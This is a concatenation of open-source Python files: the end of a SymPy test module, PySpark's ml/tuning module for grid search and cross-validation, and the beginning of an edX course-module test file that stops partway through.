S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
assert z.equals(0)
def test_random():
from sympy import posify, lucas
assert posify(x)[0]._random() is not None
assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
from sympy.abc import x
assert Float('0.1249999').round(2) == 0.12
d20 = 12345678901234567890
ans = S(d20).round(2)
assert ans.is_Float and ans == d20
ans = S(d20).round(-2)
assert ans.is_Float and ans == 12345678901234567900
assert S('1/7').round(4) == 0.1429
assert S('.[12345]').round(4) == 0.1235
assert S('.1349').round(2) == 0.13
n = S(12345)
ans = n.round()
assert ans.is_Float
assert ans == n
ans = n.round(1)
assert ans.is_Float
assert ans == n
ans = n.round(4)
assert ans.is_Float
assert ans == n
assert n.round(-1) == 12350
r = n.round(-4)
assert r == 10000
# in fact, it should equal many values since __eq__
# compares at equal precision
assert all(r == i for i in range(9984, 10049))
assert n.round(-5) == 0
assert (pi + sqrt(2)).round(2) == 4.56
assert (10*(pi + sqrt(2))).round(-1) == 50
raises(TypeError, lambda: round(x + 2, 2))
assert S(2.3).round(1) == 2.3
e = S(12.345).round(2)
assert e == round(12.345, 2)
assert type(e) is Float
assert (Float(.3, 3) + 2*pi).round() == 7
assert (Float(.3, 3) + 2*pi*100).round() == 629
assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
assert (pi + 2*E*I).round() == 3 + 5*I
assert S.Zero.round() == 0
a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
assert a.round(10) == Float('3.0000000000', '')
assert a.round(25) == Float('3.0000000000000000000000000', '')
assert a.round(26) == Float('3.00000000000000000000000000', '')
assert a.round(27) == Float('2.999999999999999999999999999', '')
assert a.round(30) == Float('2.999999999999999999999999999', '')
raises(TypeError, lambda: x.round())
# exact magnitude of 10
assert str(S(1).round()) == '1.'
assert str(S(100).round()) == '100.'
# applied to real and imaginary portions
assert (2*pi + E*I).round() == 6 + 3*I
assert (2*pi + I/10).round() == 6
assert (pi/10 + 2*I).round() == 2*I
# the lhs re and im parts are Float with dps of 2
# and those on the right have dps of 15 so they won't compare
# equal unless we use string or compare components (which will
# then coerce the floats to the same precision) or re-create
# the floats
assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
# issue 3815
assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
def test_extract_branch_factor():
assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
assert Add.make_args(x + 0) == (x,)
assert Mul.make_args(x*1) == (x,)
def test_float_0():
assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
assert Float(0.0)*x == Float(0.0)
assert (x + Float(0.0)).is_Add
def test_issue_3226():
ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
(a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
e = sqrt((a + b*t)**2 + (c + z*t)**2)
assert diff(e, t, 2) == ans
    assert e.diff(t, 2) == ans
assert diff(e, t, 2, simplify=False) != ans
| bsd-3-clause |
nlalevee/spark | python/pyspark/ml/tuning.py | 6 | 26126 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import numpy as np
from multiprocessing.pool import ThreadPool
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.common import _py2java
from pyspark.ml.param import Params, Param, TypeConverters
from pyspark.ml.param.shared import HasParallelism, HasSeed
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaParams
from pyspark.sql.functions import rand
__all__ = ['ParamGridBuilder', 'CrossValidator', 'CrossValidatorModel', 'TrainValidationSplit',
'TrainValidationSplitModel']
class ParamGridBuilder(object):
r"""
Builder for a param grid used in grid search-based model selection.
>>> from pyspark.ml.classification import LogisticRegression
>>> lr = LogisticRegression()
>>> output = ParamGridBuilder() \
... .baseOn({lr.labelCol: 'l'}) \
... .baseOn([lr.predictionCol, 'p']) \
... .addGrid(lr.regParam, [1.0, 2.0]) \
... .addGrid(lr.maxIter, [1, 5]) \
... .build()
>>> expected = [
... {lr.regParam: 1.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 1.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'}]
>>> len(output) == len(expected)
True
>>> all([m in expected for m in output])
True
.. versionadded:: 1.4.0
"""
def __init__(self):
self._param_grid = {}
@since("1.4.0")
def addGrid(self, param, values):
"""
        Adds the given parameter with the given list of candidate values to the grid.
"""
self._param_grid[param] = values
return self
@since("1.4.0")
def baseOn(self, *args):
"""
Sets the given parameters in this grid to fixed values.
Accepts either a parameter dictionary or a list of (parameter, value) pairs.
"""
if isinstance(args[0], dict):
self.baseOn(*args[0].items())
else:
for (param, value) in args:
self.addGrid(param, [value])
return self
@since("1.4.0")
def build(self):
"""
Builds and returns all combinations of parameters specified
by the param grid.
"""
keys = self._param_grid.keys()
grid_values = self._param_grid.values()
return [dict(zip(keys, prod)) for prod in itertools.product(*grid_values)]
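# Illustrative sketch (added for clarity, not part of the original module):
# build() is simply the Cartesian product of the per-parameter value lists.
# The hypothetical helper below mimics it with plain dict keys instead of
# Param objects.
def _example_grid_product(param_grid):
    # e.g. {"regParam": [1.0, 2.0], "maxIter": [1, 5]} -> 4 combinations
    keys = param_grid.keys()
    grid_values = param_grid.values()
    return [dict(zip(keys, prod)) for prod in itertools.product(*grid_values)]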
class ValidatorParams(HasSeed):
"""
Common params for TrainValidationSplit and CrossValidator.
"""
estimator = Param(Params._dummy(), "estimator", "estimator to be cross-validated")
estimatorParamMaps = Param(Params._dummy(), "estimatorParamMaps", "estimator param maps")
evaluator = Param(
Params._dummy(), "evaluator",
"evaluator used to select hyper-parameters that maximize the validator metric")
def setEstimator(self, value):
"""
Sets the value of :py:attr:`estimator`.
"""
return self._set(estimator=value)
def getEstimator(self):
"""
Gets the value of estimator or its default value.
"""
return self.getOrDefault(self.estimator)
def setEstimatorParamMaps(self, value):
"""
Sets the value of :py:attr:`estimatorParamMaps`.
"""
return self._set(estimatorParamMaps=value)
def getEstimatorParamMaps(self):
"""
Gets the value of estimatorParamMaps or its default value.
"""
return self.getOrDefault(self.estimatorParamMaps)
def setEvaluator(self, value):
"""
Sets the value of :py:attr:`evaluator`.
"""
return self._set(evaluator=value)
def getEvaluator(self):
"""
Gets the value of evaluator or its default value.
"""
return self.getOrDefault(self.evaluator)
@classmethod
def _from_java_impl(cls, java_stage):
"""
Return Python estimator, estimatorParamMaps, and evaluator from a Java ValidatorParams.
"""
# Load information from java_stage to the instance.
estimator = JavaParams._from_java(java_stage.getEstimator())
evaluator = JavaParams._from_java(java_stage.getEvaluator())
epms = [estimator._transfer_param_map_from_java(epm)
for epm in java_stage.getEstimatorParamMaps()]
return estimator, epms, evaluator
def _to_java_impl(self):
"""
Return Java estimator, estimatorParamMaps, and evaluator from this Python instance.
"""
gateway = SparkContext._gateway
cls = SparkContext._jvm.org.apache.spark.ml.param.ParamMap
java_epms = gateway.new_array(cls, len(self.getEstimatorParamMaps()))
for idx, epm in enumerate(self.getEstimatorParamMaps()):
java_epms[idx] = self.getEstimator()._transfer_param_map_to_java(epm)
java_estimator = self.getEstimator()._to_java()
java_evaluator = self.getEvaluator()._to_java()
return java_estimator, java_epms, java_evaluator
class CrossValidator(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
    K-fold cross validation performs model selection by splitting the dataset into a set of
    non-overlapping, randomly partitioned folds which are used as separate training and test
    datasets. For example, with k=3 folds, K-fold cross validation will generate 3
    (training, test) dataset pairs, each of which uses 2/3 of the data for training and 1/3
    for testing. Each fold is used as the test set exactly once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> cvModel = cv.fit(dataset)
>>> cvModel.avgMetrics[0]
0.5
>>> evaluator.evaluate(cvModel.transform(dataset))
0.8333...
.. versionadded:: 1.4.0
"""
numFolds = Param(Params._dummy(), "numFolds", "number of folds for cross validation",
typeConverter=TypeConverters.toInt)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1)
"""
super(CrossValidator, self).__init__()
self._setDefault(numFolds=3, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1):
Sets params for cross validator.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("1.4.0")
def setNumFolds(self, value):
"""
Sets the value of :py:attr:`numFolds`.
"""
return self._set(numFolds=value)
@since("1.4.0")
def getNumFolds(self):
"""
Gets the value of numFolds or its default value.
"""
return self.getOrDefault(self.numFolds)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
nFolds = self.getOrDefault(self.numFolds)
seed = self.getOrDefault(self.seed)
h = 1.0 / nFolds
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
metrics = [0.0] * numModels
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
for i in range(nFolds):
validateLB = i * h
validateUB = (i + 1) * h
condition = (df[randCol] >= validateLB) & (df[randCol] < validateUB)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
# TODO: duplicate evaluator to take extra params from input
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
currentFoldMetrics = pool.map(singleTrain, epm)
for j in range(numModels):
metrics[j] += (currentFoldMetrics[j] / nFolds)
validation.unpersist()
train.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(CrossValidatorModel(bestModel, metrics))
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
        and some extra params. This creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newCV = Params.copy(self, extra)
if self.isSet(self.estimator):
newCV.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newCV.setEvaluator(self.getEvaluator().copy(extra))
return newCV
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidator, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(CrossValidator, cls)._from_java_impl(java_stage)
numFolds = java_stage.getNumFolds()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
numFolds=numFolds, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidator. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(CrossValidator, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidator", self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setSeed(self.getSeed())
_java_obj.setNumFolds(self.getNumFolds())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
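# Illustrative sketch (added for clarity, not part of the original module):
# CrossValidator._fit assigns each row a uniform random value in [0, 1) and
# carves that interval into numFolds equal slices; rows whose value falls in
# slice i form the validation set of fold i, and all remaining rows form the
# corresponding training set. The hypothetical helper below shows the bounds.
def _example_fold_bounds(n_folds):
    # e.g. _example_fold_bounds(3) -> [(0.0, 1/3), (1/3, 2/3), (2/3, 1.0)]
    h = 1.0 / n_folds
    return [(i * h, (i + 1) * h) for i in range(n_folds)]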
class CrossValidatorModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
CrossValidatorModel contains the model with the highest average cross-validation
metric across folds and uses this model to transform input data. CrossValidatorModel
also tracks the metrics for each param map evaluated.
.. versionadded:: 1.4.0
"""
def __init__(self, bestModel, avgMetrics=[]):
super(CrossValidatorModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: Average cross-validation metrics for each paramMap in
#: CrossValidator.estimatorParamMaps, in the corresponding order.
self.avgMetrics = avgMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
avgMetrics = self.avgMetrics
return CrossValidatorModel(bestModel, avgMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidatorModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(CrossValidatorModel, cls)._from_java_impl(java_stage)
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidatorModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persist average metrics as well
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidatorModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(CrossValidatorModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
class TrainValidationSplit(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
.. note:: Experimental
Validation for hyper-parameter tuning. Randomly splits the input dataset into train and
    validation sets, and uses the evaluation metric on the validation set to select the best model.
Similar to :class:`CrossValidator`, but only splits the set once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> tvsModel = tvs.fit(dataset)
>>> evaluator.evaluate(tvsModel.transform(dataset))
0.8333...
.. versionadded:: 2.0.0
"""
trainRatio = Param(Params._dummy(), "trainRatio", "Param for ratio between train and\
validation data. Must be between 0 and 1.", typeConverter=TypeConverters.toFloat)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None)
"""
super(TrainValidationSplit, self).__init__()
self._setDefault(trainRatio=0.75, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@since("2.0.0")
@keyword_only
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,
parallelism=1, seed=None):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, trainRatio=0.75,\
parallelism=1, seed=None):
Sets params for the train validation split.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("2.0.0")
def setTrainRatio(self, value):
"""
Sets the value of :py:attr:`trainRatio`.
"""
return self._set(trainRatio=value)
@since("2.0.0")
def getTrainRatio(self):
"""
Gets the value of trainRatio or its default value.
"""
return self.getOrDefault(self.trainRatio)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
tRatio = self.getOrDefault(self.trainRatio)
seed = self.getOrDefault(self.seed)
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
condition = (df[randCol] >= tRatio)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
metrics = pool.map(singleTrain, epm)
train.unpersist()
validation.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(TrainValidationSplitModel(bestModel, metrics))
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
        and some extra params. This creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newTVS = Params.copy(self, extra)
if self.isSet(self.estimator):
newTVS.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newTVS.setEvaluator(self.getEvaluator().copy(extra))
return newTVS
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplit, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(TrainValidationSplit, cls)._from_java_impl(java_stage)
trainRatio = java_stage.getTrainRatio()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
trainRatio=trainRatio, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplit. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(TrainValidationSplit, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.TrainValidationSplit",
self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setTrainRatio(self.getTrainRatio())
_java_obj.setSeed(self.getSeed())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
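# Illustrative note (added for clarity, not part of the original module):
# TrainValidationSplit._fit above keeps rows whose random value is below
# trainRatio for training and routes the remainder to validation, so e.g.
# trainRatio=0.75 yields roughly a 75/25 train/validation split of the rows.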
class TrainValidationSplitModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
.. note:: Experimental
Model from train validation split.
.. versionadded:: 2.0.0
"""
def __init__(self, bestModel, validationMetrics=[]):
super(TrainValidationSplitModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: evaluated validation metrics
self.validationMetrics = validationMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("2.0.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
And, this creates a shallow copy of the validationMetrics.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
validationMetrics = list(self.validationMetrics)
return TrainValidationSplitModel(bestModel, validationMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java TrainValidationSplitModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
# Load information from java_stage to the instance.
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(TrainValidationSplitModel,
cls)._from_java_impl(java_stage)
# Create a new instance of this stage.
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java TrainValidationSplitModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
        # TODO: persist validation metrics as well
_java_obj = JavaParams._new_java_obj(
"org.apache.spark.ml.tuning.TrainValidationSplitModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(TrainValidationSplitModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
if __name__ == "__main__":
import doctest
from pyspark.sql import SparkSession
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
spark = SparkSession.builder\
.master("local[2]")\
.appName("ml.tuning tests")\
.getOrCreate()
sc = spark.sparkContext
globs['sc'] = sc
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
spark.stop()
if failure_count:
exit(-1)
| apache-2.0 |
antonve/s4-project-mooc | common/lib/xmodule/xmodule/tests/test_course_module.py | 2 | 15329 | import unittest
from datetime import datetime, timedelta
from fs.memoryfs import MemoryFS
from mock import Mock, patch
import itertools
from xblock.runtime import KvsFieldData, DictKeyValueStore
import xmodule.course_module
from xmodule.modulestore.xml import ImportSystem, XMLModuleStore
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from django.utils.timezone import UTC
ORG = 'test_org'
COURSE = 'test_course'
NOW = datetime.strptime('2013-01-01T01:00:00', '%Y-%m-%dT%H:%M:00').replace(tzinfo=UTC())
class CourseFieldsTestCase(unittest.TestCase):
def test_default_start_date(self):
self.assertEqual(
xmodule.course_module.CourseFields.start.default,
datetime(2030, 1, 1, tzinfo=UTC())
)
class DummySystem(ImportSystem):
@patch('xmodule.modulestore.xml.OSFS', lambda dir: MemoryFS())
def __init__(self, load_error_modules):
xmlstore = XMLModuleStore("data_dir", source_dirs=[],
load_error_modules=load_error_modules)
course_id = SlashSeparatedCourseKey(ORG, COURSE, 'test_run')
course_dir = "test_dir"
error_tracker = Mock()
super(DummySystem, self).__init__(
xmlstore=xmlstore,
course_id=course_id,
course_dir=course_dir,
error_tracker=error_tracker,
load_error_modules=load_error_modules,
field_data=KvsFieldData(DictKeyValueStore()),
)
def get_dummy_course(start, announcement=None, is_new=None, advertised_start=None, end=None, certs='end'):
"""Get a dummy course"""
system = DummySystem(load_error_modules=True)
def to_attrb(n, v):
return '' if v is None else '{0}="{1}"'.format(n, v).lower()
is_new = to_attrb('is_new', is_new)
announcement = to_attrb('announcement', announcement)
advertised_start = to_attrb('advertised_start', advertised_start)
end = to_attrb('end', end)
start_xml = '''
<course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
graceperiod="1 day" url_name="test"
start="{start}"
{announcement}
{is_new}
{advertised_start}
{end}
certificates_display_behavior="{certs}">
<chapter url="hi" url_name="ch" display_name="CH">
<html url_name="h" display_name="H">Two houses, ...</html>
</chapter>
</course>
'''.format(
org=ORG,
course=COURSE,
start=start,
is_new=is_new,
announcement=announcement,
advertised_start=advertised_start,
end=end,
certs=certs,
)
return system.process_xml(start_xml)
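# Illustrative note (added for clarity, not part of the original module):
# the nested to_attrb() helper above renders an optional XML attribute --
# it returns '' when the value is None, and otherwise a lower-cased
# attribute string, e.g. to_attrb('is_new', True) -> 'is_new="true"'.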
class HasEndedMayCertifyTestCase(unittest.TestCase):
"""Double check the semantics around when to finalize courses."""
def setUp(self):
super(HasEndedMayCertifyTestCase, self).setUp()
system = DummySystem(load_error_modules=True)
#sample_xml = """
# <course org="{org}" course="{course}" display_organization="{org}_display" display_coursenumber="{course}_display"
# graceperiod="1 day" url_name="test"
# start="2012-01-01T12:00"
# {end}
# certificates_show_before_end={cert}>
# <chapter url="hi" url_name="ch" display_name="CH">
# <html url_name="h" display_name="H">Two houses, ...</html>
# </chapter>
# </course>
#""".format(org=ORG, course=COURSE)
past_end = (datetime.now() - timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
future_end = (datetime.now() + timedelta(days=12)).strftime("%Y-%m-%dT%H:%M:00")
self.past_show_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_with_info')
self.past_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=past_end, certs='early_no_info')
self.past_noshow_certs = get_dummy_course("2012-01-01T12:00", end=past_end, certs='end')
self.future_show_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_with_info')
self.future_show_certs_no_info = get_dummy_course("2012-01-01T12:00", end=future_end, certs='early_no_info')
self.future_noshow_certs = get_dummy_course("2012-01-01T12:00", end=future_end, certs='end')
#self.past_show_certs = system.process_xml(sample_xml.format(end=past_end, cert=True))
#self.past_noshow_certs = system.process_xml(sample_xml.format(end=past_end, cert=False))
#self.future_show_certs = system.process_xml(sample_xml.format(end=future_end, cert=True))
#self.future_noshow_certs = system.process_xml(sample_xml.format(end=future_end, cert=False))
def test_has_ended(self):
"""Check that has_ended correctly tells us when a course is over."""
self.assertTrue(self.past_show_certs.has_ended())
self.assertTrue(self.past_show_certs_no_info.has_ended())
self.assertTrue(self.past_noshow_certs.has_ended())
self.assertFalse(self.future_show_certs.has_ended())
self.assertFalse(self.future_show_certs_no_info.has_ended())
self.assertFalse(self.future_noshow_certs.has_ended())
def test_may_certify(self):
"""Check that may_certify correctly tells us when a course may wrap."""
self.assertTrue(self.past_show_certs.may_certify())
self.assertTrue(self.past_noshow_certs.may_certify())
self.assertTrue(self.past_show_certs_no_info.may_certify())
self.assertTrue(self.future_show_certs.may_certify())
self.assertTrue(self.future_show_certs_no_info.may_certify())
self.assertFalse(self.future_noshow_certs.may_certify())
class IsNewCourseTestCase(unittest.TestCase):
"""Make sure the property is_new works on courses"""
def setUp(self):
super(IsNewCourseTestCase, self).setUp()
# Needed for test_is_newish
datetime_patcher = patch.object(
xmodule.course_module, 'datetime',
Mock(wraps=datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.now.return_value = NOW
self.addCleanup(datetime_patcher.stop)
@patch('xmodule.course_module.datetime.now')
def test_sorting_score(self, gmtime_mock):
gmtime_mock.return_value = NOW
day1 = '2012-01-01T12:00'
day2 = '2012-01-02T12:00'
dates = [
# Announce date takes priority over actual start
# and courses announced on a later date are newer
# than courses announced for an earlier date
((day1, day2, None), (day1, day1, None), self.assertLess),
((day1, day1, None), (day2, day1, None), self.assertEqual),
# Announce dates take priority over advertised starts
((day1, day2, day1), (day1, day1, day1), self.assertLess),
((day1, day1, day2), (day2, day1, day2), self.assertEqual),
# Later start == newer course
((day2, None, None), (day1, None, None), self.assertLess),
((day1, None, None), (day1, None, None), self.assertEqual),
# Non-parseable advertised starts are ignored in preference to actual starts
((day2, None, "Spring"), (day1, None, "Fall"), self.assertLess),
